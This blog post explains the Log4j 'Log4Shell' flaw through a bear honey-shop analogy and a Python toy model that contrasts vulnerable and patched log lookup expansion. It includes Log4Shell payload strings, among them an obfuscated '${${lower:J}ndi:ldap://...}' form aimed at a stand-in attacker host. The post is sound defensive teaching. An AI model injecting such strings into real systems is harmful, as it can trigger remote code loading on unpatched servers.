Log4j vulnerability explained
By now you have probably read about the Log4j vulnerability (Log4Shell, CVE-2021-44228) that has taken the internet by storm. This post explains what it is in plain layman's terms using an analogy.
Mama Bear owns a small honey business in the Evergreen forest called “Mama’s Honey”.
Every customer who comes to the shop gives their name, the type of honey they want and the quantity. She writes the information down on a piece of paper as follows:
Customer Name: …
Honey Type: …
She then passes the paper to Papa Bear. He takes it and notes the information in the record book in the following format:
Today <Date>, <Customer Name> purchased <Amount> of <Honey Type>. Hope they will enjoy it!
He then grabs the honey and gives it to Mama Bear, who hands it to the customer.
As the business grew, they added a new capability: if customers weren’t sure of some information, they could write a phone number in any of the fields instead. Once Mama Bear passed the paper to Papa Bear, he would call the number and act on whatever he was told, exactly as told.
Grumpy Fox was always jealous of how well Mama Bear’s business was doing. He learned of the new capability and decided to exploit it to his advantage. He goes to her shop and gives his phone number as the customer name. Mama Bear writes the information down as follows and passes it to Papa Bear:
Customer Name: 999-888-7878
Honey Type: Orange
As expected, when Papa Bear reads the paper he notices the phone number and calls Grumpy Fox for information. Grumpy Fox smirks and tells Papa Bear to destroy the record book and the honey business. Not knowing any better, Papa Bear goes ahead and does exactly that. Boom!
Now, to understand the real problem, replace the characters in the story as follows:
Mama Bear -> Your web service
Papa Bear -> Log4j library
Record book -> Your logs
Grumpy Fox -> Malicious user
Phone number -> A JNDI lookup string such as ${jndi:ldap://attacker-host/...} written into any field that ends up in a log message
Grumpy Fox's phone line -> The attacker-controlled LDAP (or RMI) server that Log4j contacts, whose reply it loads and runs
The practical lesson is that the malicious "phone number" can arrive through any field your service logs (a username, a User-Agent header, a search query), so the real fix is to stop Log4j from "making calls" at all by upgrading to a patched release, not to filter individual inputs. For more, read the detailed analysis of the vulnerability here.
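To see the mapping above as code, here is a small constructed model of the mechanism in Python (an added example for this post, not Log4j's own code): a toy record writer that, like Log4j 2 before the fix, runs `${...}` lookup expansion over the whole rendered log line, next to one that expands only the shop owner's template and copies customer data in verbatim. The names (`RECORD_TEMPLATE`, `SHOP_ENV`, `attacker.example`) and Grumpy Fox's order are assumptions made up for the illustration; a real jndi lookup actually connects to the address and loads what it returns, whereas this model only records the call.

```python
import re

# Innermost ${...} with no nested braces. Toy stand-in for Log4j's string
# substitution; the real StrSubstitutor is more elaborate but, like this one,
# resolves nested lookups from the inside out.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")

# Constructed values the shop may legitimately look up (think ${env:...}).
SHOP_ENV = {"shop": "Mama's Honey"}

# The record-book line Papa Bear writes. %field slots are filled from the
# customer's paper; ${env:shop} is a lookup the shop owner put there on purpose.
RECORD_TEMPLATE = ("Today %date, %name purchased %amount of %honey "
                   "at ${env:shop}. Hope they will enjoy it!")

# A constructed order from Grumpy Fox. The "name" field carries a payload in
# the shape Log4Shell exploits used; the nested ${lower:J} is why the word
# "jndi" never appears literally in what the attacker sent.
GRUMPY_FOX_ORDER = {
    "date": "2021-12-10",
    "name": "${${lower:J}ndi:ldap://attacker.example/a}",
    "amount": "2 jars",
    "honey": "Orange",
}


def resolve_lookup(body, contacted):
    """Resolve one lookup body such as 'lower:J', 'env:shop' or 'jndi:ldap://host/x'.

    contacted collects every address a jndi lookup would have dialled. Real
    Log4j actually connects there and may load and run what comes back
    ("Papa Bear does exactly as told"); this model only records the call.
    """
    prefix, _, arg = body.partition(":")
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "env":
        return SHOP_ENV.get(arg, "")
    if prefix == "jndi":
        contacted.append(arg)
        return "<object fetched from " + arg + ">"
    return "${" + body + "}"  # unknown lookup: leave it as written


def expand_lookups(text, contacted, max_steps=50):
    """Replace ${...} lookups, inside out, until no resolvable one remains."""
    pos = 0
    for _ in range(max_steps):
        m = LOOKUP_RE.search(text, pos)
        if not m:
            break
        replacement = resolve_lookup(m.group(1), contacted)
        if replacement == m.group(0):
            pos = m.end()  # unresolvable: skip past it
            continue
        text = text[:m.start()] + replacement + text[m.end():]
        pos = 0  # rescan: the replacement may have completed an outer lookup
    return text


def fill(template, fields):
    """Copy customer fields into %slots in a single pass, so inserted values
    are never re-scanned for further %slots."""
    return re.sub(r"%(\w+)", lambda m: fields.get(m.group(1), m.group(0)), template)


def vulnerable_record(fields, contacted):
    """Log4j 2 before the fix: the fully rendered line, customer data included,
    goes through lookup expansion. Papa Bear calls any phone number he sees."""
    return expand_lookups(fill(RECORD_TEMPLATE, fields), contacted)


def fixed_record(fields, contacted):
    """After the fix: only the owner-controlled template is expanded; customer
    data is copied in afterwards, verbatim, and never interpreted."""
    return fill(expand_lookups(RECORD_TEMPLATE, contacted), fields)


def demo(order=GRUMPY_FOX_ORDER):
    """Return (vulnerable line, addresses it dialled, fixed line, addresses it dialled)."""
    before, after = [], []
    vulnerable = vulnerable_record(order, before)
    fixed = fixed_record(order, after)
    return vulnerable, before, fixed, after


if __name__ == "__main__":
    vulnerable, before, fixed, after = demo()
    print("vulnerable:", vulnerable, "| dialled:", before)
    print("fixed:     ", fixed, "| dialled:", after)
```

Run it and compare the two lines: the vulnerable writer "dials" ldap://attacker.example/a before the record is even written, while the fixed one writes Grumpy Fox's name literally and dials nothing. Note also that the word `jndi` never appears in what Grumpy Fox submitted; the nested `${lower:J}` only becomes `j` during expansion, which is why matching inputs against the string `jndi` is not a reliable defence and upgrading Log4j is.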